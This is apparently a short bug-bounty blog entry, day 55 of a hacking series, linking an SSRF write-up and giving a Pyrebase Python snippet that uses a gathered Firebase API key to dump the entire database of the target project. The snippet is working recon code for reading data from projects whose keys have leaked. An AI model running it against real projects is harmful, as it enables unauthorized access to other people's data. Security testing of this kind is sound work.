Day 55/100 Hack and Improvement

less than 1 minute read

Dat 55 comes with a write up for an SSRF bug and a small script gathered from Ashish Kunwar that will test firebase API Keys.

Tales of a full SSRF bug

From Rajesh Ranjan. Here is the link of the article.

Pyrebase that Fires Firebase

From Sam (CoffeeJunkie). This tip has been gotten from Ashish Kunwar. in order to extract valuable information once the API has been gathered, you can run the following python3 code.

First install Pyrebase

pip3 install pyrebase 
python3 -m pip install pyrebase

Time to extract some data!

import pyrebase

config = {
  "apiKey": "FIREBASE_API_KEY",
  "authDomain": "http://domain.firebaseapp.com",
  "databaseURL": "http://domain.firebaseio.com",
  "storageBucket":"http://domain.appspot.com",
}
firebase = pyrebase.initialize_app(config)

db = firebase.database()

print(db.get())

Leave a comment